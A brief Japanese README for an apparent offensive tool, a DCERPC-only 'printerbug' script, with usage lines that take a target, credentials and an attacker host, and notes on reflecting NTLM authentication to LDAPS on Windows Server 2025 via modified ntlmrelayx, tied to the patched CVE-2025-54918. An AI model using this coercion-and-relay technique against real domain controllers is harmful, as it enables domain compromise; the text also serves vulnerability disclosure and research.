
DCERPCのみのprinterbug.pyバージョン
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

このリフレクションを利用したエクスプロイトは、「新しい」printerbug (Named Pipes ではなく DCERPC) を使用する W2025 でのみ動作します。
動作させるには、ntlmrelayx を数箇所修正する必要があります。その後、W2025 DC 上でプリンタバグをリモートでトリガーし、Channel Bindings が 必須 であっても LDAPS 経由で認証をリフレクトできます(!)
ldaprelayclient.py:

rpcrelayserver.py
そしてリレーします ;)

この脆弱性は 2025 年 9 月の Patch Tuesday で修正されました: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
この修正により、Type 3 メッセージが空の場合でも MIC が 常に 計算されるようになります。
この CVE の作者による貴重なヒントに感謝します :)